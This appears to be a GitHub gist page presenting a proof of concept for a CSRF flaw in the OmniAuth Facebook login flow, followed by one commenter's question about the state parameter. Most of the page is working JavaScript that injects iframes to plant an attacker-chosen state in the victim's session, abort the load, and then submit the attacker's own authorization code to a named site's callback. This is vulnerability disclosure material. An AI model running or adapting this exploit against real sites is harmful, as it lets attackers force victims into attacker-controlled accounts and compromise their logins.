Skip to content

@homakov /gist:3673012
Created

Embed URL

HTTPS clone URL

Subversion checkout URL

You can clone with
or
.
Download ZIP
omniauth vulnerability #2
We just put our state in user's session, then abort loading page to avoid deleting our value and then use OUR code with OUR state. CSRF again.
document.write('<iframe src="https://obaz.com/users/auth/facebook?state=123" name=im></iframe>');
setTimeout(function(){
im.stop()
document.write("<iframe src='https://obaz.com/users/auth/facebook/callback?state=123&code=AQCR436EWAPR7or-wB61HtzW1F2O1MvhdRregxe7f4dwkFZIIioePO1HtMTPK2HLPKmq85F1Fl9QhgOISHu6UDhaxNJeZ3fVm2K_Sr9VbJHbiwhFdGpLxPefKMY6fiuaS9DgMYSb-0huKcMsTd1bP13l9nWgKgHmIL2Qh6imIXV0PqRboAgJu4Txk0obe6RPerZSrbwsHHTteUwV2eg_L19o'></iframe>");
},300)
@weyus

Is this saying that the presence of the state parameter creates an opportunity for CSRF? Can you explain the gist a little more?

Does the presence of the state parameter make any difference in this scenario?

My understanding that the purpose of the state parameter itself is to help prevent CSRF (see: http://instagram.com/developer/authentication/) which states:

"Note: You may provide an optional state parameter to carry through any server-specific state you need to, for example, protect against CSRF issues."

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Something went wrong with that request. Please try again.